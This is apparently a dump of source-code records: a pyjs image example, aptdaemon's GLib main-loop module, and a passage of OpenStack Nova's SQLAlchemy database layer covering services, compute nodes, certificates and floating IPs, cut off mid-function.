# We display the "myImage.jpg" file, stored in the "public/images"
# directory, where "public" is in the application's source directory.
img = Image("images/myImage.jpg")
img.addClickListener(getattr(self, "onImageClicked"))
self.add(img)
def onImageClicked(self, sender=None):
Window.alert("Stop that!")
| apache-2.0 | 7,667,374,826,102,297,000 | 36.194444 | 79 | 0.725168 | false |
ruibarreira/linuxtrail | usr/lib/python2.7/dist-packages/aptdaemon/loop.py | 3 | 1103 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Main loop for aptdaemon."""
# Copyright (C) 2008-2009 Sebastian Heinlein <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
__author__ = "Sebastian Heinlein <[email protected]>"
__all__ = ("mainloop", "get_main_loop")
from gi.repository import GLib
mainloop = GLib.MainLoop()
def get_main_loop():
"""Return the gobject main loop as a singelton."""
return mainloop
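def _example_run_loop():
    """Illustrative sketch only (editor's addition): fetch the shared loop,
    arrange a callback that stops it after five seconds (the timeout is a
    placeholder), then block on it.
    """
    loop = get_main_loop()
    GLib.timeout_add_seconds(5, loop.quit)
    loop.run()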
# vim:ts=4:sw=4:et
| gpl-3.0 | 5,058,937,457,367,417,000 | 32.424242 | 73 | 0.729828 | false |
BeyondTheClouds/nova | nova/db/sqlalchemy/api.py | 2 | 247898 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of SQLAlchemy backend."""
import collections
import copy
import datetime
import functools
import inspect
import sys
import uuid
from oslo_config import cfg
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_db import options as oslo_db_options
from oslo_db.sqlalchemy import enginefacade
from oslo_db.sqlalchemy import update_match
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
import sqlalchemy as sa
from sqlalchemy import and_
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy import MetaData
from sqlalchemy import or_
from sqlalchemy.orm import aliased
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import joinedload_all
from sqlalchemy.orm import noload
from sqlalchemy.orm import undefer
from sqlalchemy.schema import Table
from sqlalchemy import sql
from sqlalchemy.sql.expression import asc
from sqlalchemy.sql.expression import desc
from sqlalchemy.sql import false
from sqlalchemy.sql import func
from sqlalchemy.sql import null
from sqlalchemy.sql import true
from nova import block_device
from nova.compute import task_states
from nova.compute import vm_states
import nova.context
from nova.db.sqlalchemy import models
from nova import exception
from nova.i18n import _, _LI, _LE, _LW
from nova.objects import fields
from nova import quota
from nova import safe_utils
db_opts = [
cfg.StrOpt('osapi_compute_unique_server_name_scope',
default='',
help='When set, compute API will consider duplicate hostnames '
'invalid within the specified scope, regardless of case. '
'Should be empty, "project" or "global".'),
]
api_db_opts = [
cfg.StrOpt('connection',
help='The SQLAlchemy connection string to use to connect to '
'the Nova API database.',
secret=True),
cfg.BoolOpt('sqlite_synchronous',
default=True,
help='If True, SQLite uses synchronous mode.'),
cfg.StrOpt('slave_connection',
secret=True,
help='The SQLAlchemy connection string to use to connect to the'
' slave database.'),
cfg.StrOpt('mysql_sql_mode',
default='TRADITIONAL',
help='The SQL mode to be used for MySQL sessions. '
'This option, including the default, overrides any '
'server-set SQL mode. To use whatever SQL mode '
'is set by the server configuration, '
'set this to no value. Example: mysql_sql_mode='),
cfg.IntOpt('idle_timeout',
default=3600,
help='Timeout before idle SQL connections are reaped.'),
cfg.IntOpt('max_pool_size',
help='Maximum number of SQL connections to keep open in a '
'pool.'),
cfg.IntOpt('max_retries',
default=10,
help='Maximum number of database connection retries '
'during startup. Set to -1 to specify an infinite '
'retry count.'),
cfg.IntOpt('retry_interval',
default=10,
help='Interval between retries of opening a SQL connection.'),
cfg.IntOpt('max_overflow',
help='If set, use this value for max_overflow with '
'SQLAlchemy.'),
cfg.IntOpt('connection_debug',
default=0,
help='Verbosity of SQL debugging information: 0=None, '
'100=Everything.'),
cfg.BoolOpt('connection_trace',
default=False,
help='Add Python stack traces to SQL as comment strings.'),
cfg.IntOpt('pool_timeout',
help='If set, use this value for pool_timeout with '
'SQLAlchemy.'),
]
CONF = cfg.CONF
CONF.register_opts(db_opts)
CONF.register_opts(oslo_db_options.database_opts, 'database')
CONF.register_opts(api_db_opts, group='api_database')
CONF.import_opt('until_refresh', 'nova.quota')
LOG = logging.getLogger(__name__)
main_context_manager = enginefacade.transaction_context()
api_context_manager = enginefacade.transaction_context()
def _get_db_conf(conf_group, connection=None):
kw = dict(
connection=connection or conf_group.connection,
slave_connection=conf_group.slave_connection,
sqlite_fk=False,
__autocommit=True,
expire_on_commit=False,
mysql_sql_mode=conf_group.mysql_sql_mode,
idle_timeout=conf_group.idle_timeout,
connection_debug=conf_group.connection_debug,
max_pool_size=conf_group.max_pool_size,
max_overflow=conf_group.max_overflow,
pool_timeout=conf_group.pool_timeout,
sqlite_synchronous=conf_group.sqlite_synchronous,
connection_trace=conf_group.connection_trace,
max_retries=conf_group.max_retries,
retry_interval=conf_group.retry_interval)
return kw
def _context_manager_from_context(context):
if context:
try:
return context.db_connection
except AttributeError:
pass
def configure(conf):
main_context_manager.configure(**_get_db_conf(conf.database))
api_context_manager.configure(**_get_db_conf(conf.api_database))
def create_context_manager(connection=None):
"""Create a database context manager object.
    :param connection: The database connection string
"""
ctxt_mgr = enginefacade.transaction_context()
ctxt_mgr.configure(**_get_db_conf(CONF.database, connection=connection))
return ctxt_mgr
def get_context_manager(context):
"""Get a database context manager object.
:param context: The request context that can contain a context manager
"""
return _context_manager_from_context(context) or main_context_manager
def get_engine(use_slave=False, context=None):
"""Get a database engine object.
:param use_slave: Whether to use the slave connection
:param context: The request context that can contain a context manager
"""
ctxt_mgr = _context_manager_from_context(context) or main_context_manager
return ctxt_mgr.get_legacy_facade().get_engine(use_slave=use_slave)
def get_api_engine():
return api_context_manager.get_legacy_facade().get_engine()
_SHADOW_TABLE_PREFIX = 'shadow_'
_DEFAULT_QUOTA_NAME = 'default'
PER_PROJECT_QUOTAS = ['fixed_ips', 'floating_ips', 'networks']
def get_backend():
"""The backend is this module itself."""
return sys.modules[__name__]
def require_context(f):
"""Decorator to require *any* user or admin context.
This does no authorization for user or project access matching, see
:py:func:`nova.context.authorize_project_context` and
:py:func:`nova.context.authorize_user_context`.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_instance_exists_using_uuid(f):
"""Decorator to require the specified instance to exist.
Requires the wrapped function to use context and instance_uuid as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, instance_uuid, *args, **kwargs):
instance_get_by_uuid(context, instance_uuid)
return f(context, instance_uuid, *args, **kwargs)
return wrapper
def require_aggregate_exists(f):
"""Decorator to require the specified aggregate to exist.
Requires the wrapped function to use context and aggregate_id as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, aggregate_id, *args, **kwargs):
aggregate_get(context, aggregate_id)
return f(context, aggregate_id, *args, **kwargs)
return wrapper
def select_db_reader_mode(f):
"""Decorator to select synchronous or asynchronous reader mode.
The kwarg argument 'use_slave' defines reader mode. Asynchronous reader
will be used if 'use_slave' is True and synchronous reader otherwise.
If 'use_slave' is not specified default value 'False' will be used.
Wrapped function must have a context in the arguments.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(f)
keyed_args = inspect.getcallargs(wrapped_func, *args, **kwargs)
context = keyed_args['context']
use_slave = keyed_args.get('use_slave', False)
if use_slave:
reader_mode = main_context_manager.async
else:
reader_mode = main_context_manager.reader
with reader_mode.using(context):
return f(*args, **kwargs)
return wrapper
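@select_db_reader_mode
def _example_select_db_reader_mode(context, instance_uuid, use_slave=False):
    """Illustrative sketch only (editor's addition, unused by Nova): a reader
    that can be pointed at the asynchronous slave connection simply by passing
    use_slave=True; the decorator inspects the keyword arguments and picks the
    reader mode before the body runs.
    """
    return model_query(context, models.Instance).filter_by(
        uuid=instance_uuid).first()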
def pick_context_manager_writer(f):
"""Decorator to use a writer db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.writer.using(context):
return f(context, *args, **kwargs)
return wrapped
def pick_context_manager_reader(f):
"""Decorator to use a reader db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.reader.using(context):
return f(context, *args, **kwargs)
return wrapped
def pick_context_manager_reader_allow_async(f):
"""Decorator to use a reader.allow_async db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.reader.allow_async.using(context):
return f(context, *args, **kwargs)
return wrapped
def model_query(context, model,
args=None,
read_deleted=None,
project_only=False):
"""Query helper that accounts for context's `read_deleted` field.
:param context: NovaContext of the query.
:param model: Model to query. Must be a subclass of ModelBase.
:param args: Arguments to query. If None - model is used.
:param read_deleted: If not None, overrides context's read_deleted field.
Permitted values are 'no', which does not return
deleted values; 'only', which only returns deleted
values; and 'yes', which does not filter deleted
values.
:param project_only: If set and context is user-type, then restrict
query to match the context's project_id. If set to
'allow_none', restriction includes project_id = None.
"""
if read_deleted is None:
read_deleted = context.read_deleted
query_kwargs = {}
if 'no' == read_deleted:
query_kwargs['deleted'] = False
elif 'only' == read_deleted:
query_kwargs['deleted'] = True
elif 'yes' == read_deleted:
pass
else:
raise ValueError(_("Unrecognized read_deleted value '%s'")
% read_deleted)
query = sqlalchemyutils.model_query(
model, context.session, args, **query_kwargs)
# We can't use oslo.db model_query's project_id here, as it doesn't allow
# us to return both our projects and unowned projects.
if nova.context.is_user_context(context) and project_only:
if project_only == 'allow_none':
query = query.\
filter(or_(model.project_id == context.project_id,
model.project_id == null()))
else:
query = query.filter_by(project_id=context.project_id)
return query
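def _example_model_query_usage(context):
    """Illustrative sketch only (editor's addition, unused by Nova): combine
    the read_deleted and project_only knobs documented above to list the
    calling project's soft-deleted instances.
    """
    return model_query(context, models.Instance, read_deleted='only',
                       project_only=True).all()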
def convert_objects_related_datetimes(values, *datetime_keys):
if not datetime_keys:
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
for key in datetime_keys:
if key in values and values[key]:
if isinstance(values[key], six.string_types):
try:
values[key] = timeutils.parse_strtime(values[key])
except ValueError:
# Try alternate parsing since parse_strtime will fail
                    # when converting, for example, '2015-05-28T19:59:38+00:00'
values[key] = timeutils.parse_isotime(values[key])
# NOTE(danms): Strip UTC timezones from datetimes, since they're
# stored that way in the database
values[key] = values[key].replace(tzinfo=None)
return values
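def _example_convert_datetimes():
    """Illustrative sketch only (editor's addition): an ISO 8601 string with a
    UTC offset is parsed by the fallback branch above and stripped of its
    tzinfo before being handed to the database layer.
    """
    values = {'created_at': '2015-05-28T19:59:38+00:00'}
    return convert_objects_related_datetimes(values, 'created_at')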
def _sync_instances(context, project_id, user_id):
return dict(zip(('instances', 'cores', 'ram'),
_instance_data_get_for_user(context, project_id, user_id)))
def _sync_floating_ips(context, project_id, user_id):
return dict(floating_ips=_floating_ip_count_by_project(
context, project_id))
def _sync_fixed_ips(context, project_id, user_id):
return dict(fixed_ips=_fixed_ip_count_by_project(context, project_id))
def _sync_security_groups(context, project_id, user_id):
return dict(security_groups=_security_group_count_by_project_and_user(
context, project_id, user_id))
def _sync_server_groups(context, project_id, user_id):
return dict(server_groups=_instance_group_count_by_project_and_user(
context, project_id, user_id))
QUOTA_SYNC_FUNCTIONS = {
'_sync_instances': _sync_instances,
'_sync_floating_ips': _sync_floating_ips,
'_sync_fixed_ips': _sync_fixed_ips,
'_sync_security_groups': _sync_security_groups,
'_sync_server_groups': _sync_server_groups,
}
###################
def constraint(**conditions):
return Constraint(conditions)
def equal_any(*values):
return EqualityCondition(values)
def not_equal(*values):
return InequalityCondition(values)
class Constraint(object):
def __init__(self, conditions):
self.conditions = conditions
def apply(self, model, query):
for key, condition in self.conditions.items():
for clause in condition.clauses(getattr(model, key)):
query = query.filter(clause)
return query
class EqualityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
# method signature requires us to return an iterable even if for OR
# operator this will actually be a single clause
return [or_(*[field == value for value in self.values])]
class InequalityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
return [field != value for value in self.values]
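def _example_conditional_destroy(context, instance_uuid):
    """Illustrative sketch only (editor's addition): the helpers above build a
    Constraint that callers hand to instance_destroy() so the delete only
    proceeds while the row still matches the expected vm/task states. The
    states chosen here are placeholders.
    """
    cons = constraint(vm_state=equal_any(vm_states.ACTIVE, vm_states.STOPPED),
                      task_state=not_equal(task_states.RESIZE_MIGRATING))
    return instance_destroy(context, instance_uuid, constraint=cons)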
###################
@pick_context_manager_writer
def service_destroy(context, service_id):
service = service_get(context, service_id)
model_query(context, models.Service).\
filter_by(id=service_id).\
soft_delete(synchronize_session=False)
# TODO(sbauza): Remove the service_id filter in a later release
# once we are sure that all compute nodes report the host field
model_query(context, models.ComputeNode).\
filter(or_(models.ComputeNode.service_id == service_id,
models.ComputeNode.host == service['host'])).\
soft_delete(synchronize_session=False)
@pick_context_manager_reader
def service_get(context, service_id):
query = model_query(context, models.Service).filter_by(id=service_id)
result = query.first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@pick_context_manager_reader_allow_async
def service_get_minimum_version(context, binary):
min_version = context.session.query(
func.min(models.Service.version)).\
filter(models.Service.binary == binary).\
filter(models.Service.forced_down == false()).\
scalar()
return min_version
@pick_context_manager_reader
def service_get_all(context, disabled=None):
query = model_query(context, models.Service)
if disabled is not None:
query = query.filter_by(disabled=disabled)
return query.all()
@pick_context_manager_reader
def service_get_all_by_topic(context, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(topic=topic).\
all()
@pick_context_manager_reader
def service_get_by_host_and_topic(context, host, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(host=host).\
filter_by(topic=topic).\
first()
@pick_context_manager_reader
def service_get_all_by_binary(context, binary, include_disabled=False):
query = model_query(context, models.Service, read_deleted="no").\
filter_by(binary=binary)
if not include_disabled:
query = query.filter_by(disabled=False)
return query.all()
@pick_context_manager_reader
def service_get_by_host_and_binary(context, host, binary):
result = model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
filter_by(binary=binary).\
first()
if not result:
raise exception.HostBinaryNotFound(host=host, binary=binary)
return result
@pick_context_manager_reader
def service_get_all_by_host(context, host):
return model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
all()
@pick_context_manager_reader_allow_async
def service_get_by_compute_host(context, host):
result = model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
filter_by(binary='nova-compute').\
first()
if not result:
raise exception.ComputeHostNotFound(host=host)
return result
@pick_context_manager_writer
def service_create(context, values):
service_ref = models.Service()
service_ref.update(values)
if not CONF.enable_new_services:
service_ref.disabled = True
try:
service_ref.save(context.session)
except db_exc.DBDuplicateEntry as e:
if 'binary' in e.columns:
raise exception.ServiceBinaryExists(host=values.get('host'),
binary=values.get('binary'))
raise exception.ServiceTopicExists(host=values.get('host'),
topic=values.get('topic'))
return service_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def service_update(context, service_id, values):
service_ref = service_get(context, service_id)
# Only servicegroup.drivers.db.DbDriver._report_state() updates
# 'report_count', so if that value changes then store the timestamp
# as the last time we got a state report.
if 'report_count' in values:
if values['report_count'] > service_ref.report_count:
service_ref.last_seen_up = timeutils.utcnow()
service_ref.update(values)
return service_ref
###################
def _compute_node_select(context, filters=None):
# NOTE(jaypipes): With the addition of the resource-providers database
# schema, inventory and allocation information for various resources
# on a compute node are to be migrated from the compute_nodes and
# instance_extra tables into the new inventories and allocations tables.
# During the time that this data migration is ongoing we need to allow
# the scheduler to essentially be blind to the underlying database
# schema changes. So, this query here returns three sets of resource
# attributes:
# - inv_memory_mb, inv_memory_mb_used, inv_memory_mb_reserved,
# inv_ram_allocation_ratio
# - inv_vcpus, inv_vcpus_used, inv_cpu_allocation_ratio
# - inv_local_gb, inv_local_gb_used, inv_disk_allocation_ratio
# These resource capacity/usage fields store the total and used values
    # for those three resource classes that are currently stored in similar
# fields in the compute_nodes table (e.g. memory_mb and memory_mb_used)
# The code that runs the online data migrations will be able to tell if
# the compute node has had its inventory information moved to the
# inventories table by checking for a non-None field value for the
# inv_memory_mb, inv_vcpus, and inv_disk_gb fields.
#
    # The SQLAlchemy code below produces the following SQL statement
# exactly:
#
# SELECT
# cn.*,
# ram_inv.total as inv_memory_mb,
# ram_inv.reserved as inv_memory_mb_reserved,
# ram_inv.allocation_ratio as inv_ram_allocation_ratio,
# ram_usage.used as inv_memory_mb_used,
# cpu_inv.total as inv_vcpus,
# cpu_inv.allocation_ratio as inv_cpu_allocation_ratio,
# cpu_usage.used as inv_vcpus_used,
# disk_inv.total as inv_local_gb,
# disk_inv.allocation_ratio as inv_disk_allocation_ratio,
# disk_usage.used as inv_local_gb_used
# FROM compute_nodes AS cn
# LEFT OUTER JOIN resource_providers AS rp
# ON cn.uuid = rp.uuid
# LEFT OUTER JOIN inventories AS ram_inv
# ON rp.id = ram_inv.resource_provider_id
# AND ram_inv.resource_class_id = :RAM_MB
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :RAM_MB
# GROUP BY resource_provider_id
# ) AS ram_usage
# ON ram_inv.resource_provider_id = ram_usage.resource_provider_id
# LEFT OUTER JOIN inventories AS cpu_inv
# ON rp.id = cpu_inv.resource_provider_id
# AND cpu_inv.resource_class_id = :VCPUS
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :VCPUS
# GROUP BY resource_provider_id
# ) AS cpu_usage
# ON cpu_inv.resource_provider_id = cpu_usage.resource_provider_id
# LEFT OUTER JOIN inventories AS disk_inv
# ON rp.id = disk_inv.resource_provider_id
# AND disk_inv.resource_class_id = :DISK_GB
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :DISK_GB
# GROUP BY resource_provider_id
# ) AS disk_usage
# ON disk_inv.resource_provider_id = disk_usage.resource_provider_id
# WHERE cn.deleted = 0;
if filters is None:
filters = {}
RAM_MB = fields.ResourceClass.index(fields.ResourceClass.MEMORY_MB)
VCPU = fields.ResourceClass.index(fields.ResourceClass.VCPU)
DISK_GB = fields.ResourceClass.index(fields.ResourceClass.DISK_GB)
cn_tbl = sa.alias(models.ComputeNode.__table__, name='cn')
rp_tbl = sa.alias(models.ResourceProvider.__table__, name='rp')
inv_tbl = models.Inventory.__table__
alloc_tbl = models.Allocation.__table__
ram_inv = sa.alias(inv_tbl, name='ram_inv')
cpu_inv = sa.alias(inv_tbl, name='cpu_inv')
disk_inv = sa.alias(inv_tbl, name='disk_inv')
ram_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
ram_usage = ram_usage.where(alloc_tbl.c.resource_class_id == RAM_MB)
ram_usage = ram_usage.group_by(alloc_tbl.c.resource_provider_id)
ram_usage = sa.alias(ram_usage, name='ram_usage')
cpu_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
cpu_usage = cpu_usage.where(alloc_tbl.c.resource_class_id == VCPU)
cpu_usage = cpu_usage.group_by(alloc_tbl.c.resource_provider_id)
cpu_usage = sa.alias(cpu_usage, name='cpu_usage')
disk_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
disk_usage = disk_usage.where(alloc_tbl.c.resource_class_id == DISK_GB)
disk_usage = disk_usage.group_by(alloc_tbl.c.resource_provider_id)
disk_usage = sa.alias(disk_usage, name='disk_usage')
cn_rp_join = sql.outerjoin(
cn_tbl, rp_tbl,
cn_tbl.c.uuid == rp_tbl.c.uuid)
ram_inv_join = sql.outerjoin(
cn_rp_join, ram_inv,
sql.and_(rp_tbl.c.id == ram_inv.c.resource_provider_id,
ram_inv.c.resource_class_id == RAM_MB))
ram_join = sql.outerjoin(
ram_inv_join, ram_usage,
ram_inv.c.resource_provider_id == ram_usage.c.resource_provider_id)
cpu_inv_join = sql.outerjoin(
ram_join, cpu_inv,
sql.and_(rp_tbl.c.id == cpu_inv.c.resource_provider_id,
cpu_inv.c.resource_class_id == VCPU))
cpu_join = sql.outerjoin(
cpu_inv_join, cpu_usage,
cpu_inv.c.resource_provider_id == cpu_usage.c.resource_provider_id)
disk_inv_join = sql.outerjoin(
cpu_join, disk_inv,
sql.and_(rp_tbl.c.id == disk_inv.c.resource_provider_id,
disk_inv.c.resource_class_id == DISK_GB))
disk_join = sql.outerjoin(
disk_inv_join, disk_usage,
disk_inv.c.resource_provider_id == disk_usage.c.resource_provider_id)
# TODO(jaypipes): Remove all capacity and usage fields from this method
# entirely and deal with allocations and inventory information in a
# tabular fashion instead of a columnar fashion like the legacy
# compute_nodes table schema does.
inv_cols = [
ram_inv.c.total.label('inv_memory_mb'),
ram_inv.c.reserved.label('inv_memory_mb_reserved'),
ram_inv.c.allocation_ratio.label('inv_ram_allocation_ratio'),
ram_usage.c.used.label('inv_memory_mb_used'),
cpu_inv.c.total.label('inv_vcpus'),
cpu_inv.c.allocation_ratio.label('inv_cpu_allocation_ratio'),
cpu_usage.c.used.label('inv_vcpus_used'),
disk_inv.c.total.label('inv_local_gb'),
disk_inv.c.reserved.label('inv_local_gb_reserved'),
disk_inv.c.allocation_ratio.label('inv_disk_allocation_ratio'),
disk_usage.c.used.label('inv_local_gb_used'),
]
cols_in_output = list(cn_tbl.c)
cols_in_output.extend(inv_cols)
select = sa.select(cols_in_output).select_from(disk_join)
if context.read_deleted == "no":
select = select.where(cn_tbl.c.deleted == 0)
if "compute_id" in filters:
select = select.where(cn_tbl.c.id == filters["compute_id"])
if "service_id" in filters:
select = select.where(cn_tbl.c.service_id == filters["service_id"])
if "host" in filters:
select = select.where(cn_tbl.c.host == filters["host"])
if "hypervisor_hostname" in filters:
hyp_hostname = filters["hypervisor_hostname"]
select = select.where(cn_tbl.c.hypervisor_hostname == hyp_hostname)
engine = get_engine(context)
conn = engine.connect()
results = conn.execute(select).fetchall()
# Callers expect dict-like objects, not SQLAlchemy RowProxy objects...
results = [dict(r) for r in results]
conn.close()
return results
@pick_context_manager_reader
def compute_node_get(context, compute_id):
results = _compute_node_select(context, {"compute_id": compute_id})
if not results:
raise exception.ComputeHostNotFound(host=compute_id)
return results[0]
@pick_context_manager_reader
def compute_node_get_model(context, compute_id):
# TODO(edleafe): remove once the compute node resource provider migration
# is complete, and this distinction is no longer necessary.
result = model_query(context, models.ComputeNode).\
filter_by(id=compute_id).\
first()
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
return result
@pick_context_manager_reader
def compute_nodes_get_by_service_id(context, service_id):
results = _compute_node_select(context, {"service_id": service_id})
if not results:
raise exception.ServiceNotFound(service_id=service_id)
return results
@pick_context_manager_reader
def compute_node_get_by_host_and_nodename(context, host, nodename):
results = _compute_node_select(context,
{"host": host, "hypervisor_hostname": nodename})
if not results:
raise exception.ComputeHostNotFound(host=host)
return results[0]
@pick_context_manager_reader_allow_async
def compute_node_get_all_by_host(context, host):
results = _compute_node_select(context, {"host": host})
if not results:
raise exception.ComputeHostNotFound(host=host)
return results
@pick_context_manager_reader
def compute_node_get_all(context):
return _compute_node_select(context)
@pick_context_manager_reader
def compute_node_search_by_hypervisor(context, hypervisor_match):
field = models.ComputeNode.hypervisor_hostname
return model_query(context, models.ComputeNode).\
filter(field.like('%%%s%%' % hypervisor_match)).\
all()
@pick_context_manager_writer
def compute_node_create(context, values):
"""Creates a new ComputeNode and populates the capacity fields
with the most recent data.
"""
convert_objects_related_datetimes(values)
compute_node_ref = models.ComputeNode()
compute_node_ref.update(values)
compute_node_ref.save(context.session)
return compute_node_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def compute_node_update(context, compute_id, values):
"""Updates the ComputeNode record with the most recent data."""
compute_ref = compute_node_get_model(context, compute_id)
# Always update this, even if there's going to be no other
# changes in data. This ensures that we invalidate the
# scheduler cache of compute node data in case of races.
values['updated_at'] = timeutils.utcnow()
convert_objects_related_datetimes(values)
compute_ref.update(values)
return compute_ref
@pick_context_manager_writer
def compute_node_delete(context, compute_id):
"""Delete a ComputeNode record."""
result = model_query(context, models.ComputeNode).\
filter_by(id=compute_id).\
soft_delete(synchronize_session=False)
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
@pick_context_manager_reader
def compute_node_statistics(context):
"""Compute statistics over all compute nodes."""
# TODO(sbauza): Remove the service_id filter in a later release
# once we are sure that all compute nodes report the host field
_filter = or_(models.Service.host == models.ComputeNode.host,
models.Service.id == models.ComputeNode.service_id)
result = model_query(context,
models.ComputeNode, (
func.count(models.ComputeNode.id),
func.sum(models.ComputeNode.vcpus),
func.sum(models.ComputeNode.memory_mb),
func.sum(models.ComputeNode.local_gb),
func.sum(models.ComputeNode.vcpus_used),
func.sum(models.ComputeNode.memory_mb_used),
func.sum(models.ComputeNode.local_gb_used),
func.sum(models.ComputeNode.free_ram_mb),
func.sum(models.ComputeNode.free_disk_gb),
func.sum(models.ComputeNode.current_workload),
func.sum(models.ComputeNode.running_vms),
func.sum(models.ComputeNode.disk_available_least),
), read_deleted="no").\
filter(models.Service.disabled == false()).\
filter(models.Service.binary == "nova-compute").\
filter(_filter).\
first()
# Build a dict of the info--making no assumptions about result
fields = ('count', 'vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used', 'free_ram_mb', 'free_disk_gb',
'current_workload', 'running_vms', 'disk_available_least')
return {field: int(result[idx] or 0)
for idx, field in enumerate(fields)}
###################
@main_context_manager.writer
def certificate_create(context, values):
certificate_ref = models.Certificate()
for (key, value) in values.items():
certificate_ref[key] = value
certificate_ref.save(context.session)
return certificate_ref
@main_context_manager.reader
def certificate_get_all_by_project(context, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@main_context_manager.reader
def certificate_get_all_by_user(context, user_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@main_context_manager.reader
def certificate_get_all_by_user_and_project(context, user_id, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
filter_by(project_id=project_id).\
all()
###################
@require_context
@main_context_manager.reader
def floating_ip_get(context, id):
try:
result = model_query(context, models.FloatingIp, project_only=True).\
filter_by(id=id).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFound(id=id)
except db_exc.DBError:
msg = _LW("Invalid floating IP ID %s in request") % id
LOG.warning(msg)
raise exception.InvalidID(id=id)
return result
@require_context
@main_context_manager.reader
def floating_ip_get_pools(context):
pools = []
for result in model_query(context, models.FloatingIp,
(models.FloatingIp.pool,)).distinct():
pools.append({'name': result[0]})
return pools
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def floating_ip_allocate_address(context, project_id, pool,
auto_assigned=False):
nova.context.authorize_project_context(context, project_id)
floating_ip_ref = model_query(context, models.FloatingIp,
read_deleted="no").\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
first()
if not floating_ip_ref:
raise exception.NoMoreFloatingIps()
params = {'project_id': project_id, 'auto_assigned': auto_assigned}
rows_update = model_query(context, models.FloatingIp, read_deleted="no").\
filter_by(id=floating_ip_ref['id']).\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
update(params, synchronize_session='evaluate')
if not rows_update:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another one')
raise db_exc.RetryRequest(exception.FloatingIpAllocateFailed())
return floating_ip_ref['address']
@require_context
@main_context_manager.writer
def floating_ip_bulk_create(context, ips, want_result=True):
try:
tab = models.FloatingIp().__table__
context.session.execute(tab.insert(), ips)
except db_exc.DBDuplicateEntry as e:
raise exception.FloatingIpExists(address=e.value)
if want_result:
return model_query(context, models.FloatingIp).filter(
models.FloatingIp.address.in_(
[ip['address'] for ip in ips])).all()
def _ip_range_splitter(ips, block_size=256):
"""Yields blocks of IPs no more than block_size elements long."""
out = []
